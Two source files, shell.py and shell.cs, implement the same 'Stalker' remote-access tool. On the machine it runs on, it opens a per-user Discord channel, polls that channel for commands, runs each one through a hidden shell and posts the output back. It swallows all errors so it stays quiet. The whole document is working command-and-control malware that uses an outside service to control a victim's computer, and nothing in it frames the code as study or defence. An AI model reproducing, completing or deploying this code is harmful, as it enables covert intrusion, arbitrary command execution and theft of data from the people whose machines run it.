File: shell.py
import os
import time
import requests
import subprocess



class Stalker:
    def __init__(self):
        self.running = True

        # Discord token
        self.discord_token = "" 
        # Discord Server link
        self.DiscordServer_url = ""


        self.Shell_url = ""
        self.ShellDelay_sec = 10


        self.Username = os.getlogin()
        self.Headers = {"Authorization": self.discord_token}
    

    def Shell(self):
        while self.running:
            try:
                time.sleep(self.ShellDelay_sec)
                res = requests.get(self.Shell_url + "?limit=1", headers=self.Headers)
                command = res.json()[0]["content"]

                if command == "quit":
                    self.running = False
                    self.SendText("<shell>bye my friend, hopefully i see u soon :)", self.Shell_url)
                elif command.startswith("<shell>"):
                    pass
                elif command.startswith("cd"):
                    os.chdir(command[3:])
                    self.SendText("<shell>" + command, self.Shell_url)
                elif len(command) > 0:
                    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
                    stdout_value = proc.stdout.read() + proc.stderr.read()
                    if len(stdout_value) > 1900:
                        stdout_value = stdout_value[0:1900]

                    self.SendText((b"<shell>" + stdout_value).decode("cp850"), self.Shell_url)
            except:
                pass

    
    def SendText(self, text, url):
        data = {"content": text}
        requests.post(url, headers=self.Headers, data=data)


    def MakeChannel(self, name):
        payload = {
            "guild_id": "1246153061517234236",
            "name": name,
            "type": 0
        }
        requests.post(self.DiscordServer_url, json=payload, headers=self.Headers)


    def MakeUrl(self, number):
        return f"https://discord.com/api/v9/channels/{number}/messages"


    def GiveChannelToVar(self):
        r = requests.get(self.DiscordServer_url, headers=self.Headers)

        for pp in r.json():
            if pp["type"] == 0:
                n = pp["name"]

                if n == f"{self.Username}-shell":
                    self.Shell_url = self.MakeUrl(pp["id"])

    
    def FindChannelUrl(self):
        r = requests.get(self.DiscordServer_url, headers=self.Headers)
        con = r.content.decode("utf-8")

        if con.find(f"{self.Username}-shell") == -1:
            self.MakeChannel(f"{self.Username}-shell")

        self.GiveChannelToVar()


    def start(self):
        self.FindChannelUrl()
        self.Shell()


Stalker().start()

File: shell.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Http;
using System.Text.Json;
using System.Text;
using System.Threading;
using System.Threading.Tasks;




class Stalker
{
    private bool running;
    private string discordToken;
    private string discordServerUrl;
    private string shellUrl;
    private int shellDelaySec;
    private string username;
    private string programName;
    private HttpClient httpClient;

    public Stalker()
    {
        running = true;

        // Discord token
        discordToken = "";
        // Discord Server link
        discordServerUrl = "";

        shellUrl = "";
        shellDelaySec = 10;

        username = Environment.UserName;
        programName = Path.GetFileName(System.Reflection.Assembly.GetExecutingAssembly().Location);
        httpClient = new HttpClient();
        httpClient.DefaultRequestHeaders.Add("Authorization", discordToken);
    }

    public async Task ShellAsync()
    {
        while (running)
        {
            try
            {
                await Task.Delay(shellDelaySec * 1000);
                var response = await httpClient.GetAsync(shellUrl + "?limit=1");
                var responseString = await response.Content.ReadAsStringAsync();
                var jsonArray = JsonDocument.Parse(responseString).RootElement;
                var command = jsonArray[0].GetProperty("content").GetString();

                if (command == "quit")
                {
                    running = false;
                    await SendTextAsync("<shell>bye my friend, hopefully i see u soon :)", shellUrl);
                }
                else if (command.StartsWith("<shell>"))
                {
                    // Handle shell-specific commands
                }
                else if (command.StartsWith("cd"))
                {
                    Directory.SetCurrentDirectory(command.Substring(3));
                    await SendTextAsync("<shell>" + command, shellUrl);
                }
                else if (command.Length > 0)
                {
                    var proc = new Process
                    {
                        StartInfo = new ProcessStartInfo
                        {
                            FileName = "cmd.exe",
                            Arguments = "/c " + command,
                            RedirectStandardOutput = true,
                            RedirectStandardError = true,
                            UseShellExecute = false,
                            CreateNoWindow = true
                        }
                    };
                    proc.Start();
                    var stdoutValue = await proc.StandardOutput.ReadToEndAsync() + await proc.StandardError.ReadToEndAsync();
                    if (stdoutValue.Length > 1900)
                    {
                        stdoutValue = stdoutValue.Substring(0, 1900);
                    }
                    await SendTextAsync("<shell>" + stdoutValue, shellUrl);
                }
            }
            catch
            {
                // Handle errors silently
            }
        }
    }

    public async Task SendTextAsync(string text, string url)
    {
        var data = new StringContent(JsonSerializer.Serialize(new { content = text }), Encoding.UTF8, "application/json");
        await httpClient.PostAsync(url, data);
    }

    public async Task MakeChannelAsync(string name)
    {
        var payload = new
        {
            name = name,
            type = 0
        };
        var data = new StringContent(JsonSerializer.Serialize(payload), Encoding.UTF8, "application/json");
        await httpClient.PostAsync(discordServerUrl, data);
    }

    public string MakeUrl(string number)
    {
        return $"https://discord.com/api/v9/channels/{number}/messages";
    }

    public async Task GiveChannelToVarAsync()
    {
        var response = await httpClient.GetStringAsync(discordServerUrl);
        var jsonArray = JsonDocument.Parse(response).RootElement;

        foreach (var pp in jsonArray.EnumerateArray())
        {
            if (pp.GetProperty("type").GetInt32() == 0)
            {
                var n = pp.GetProperty("name").GetString();
                if (n == $"{username}-shell")
                {
                    shellUrl = MakeUrl(pp.GetProperty("id").GetString());
                }
            }
        }
    }

    public async Task FindChannelUrlAsync()
    {
        var response = await httpClient.GetStringAsync(discordServerUrl);
        var content = response;

        if (!content.Contains($"{username}-shell"))
        {
            await MakeChannelAsync($"{username}-shell");
        }

        await GiveChannelToVarAsync();
    }

    public async Task StartAsync()
    {
        await FindChannelUrlAsync();
        await ShellAsync();
    }
}

class Program
{
    static async Task Main(string[] args)
    {
        await new Stalker().StartAsync();
    }
}
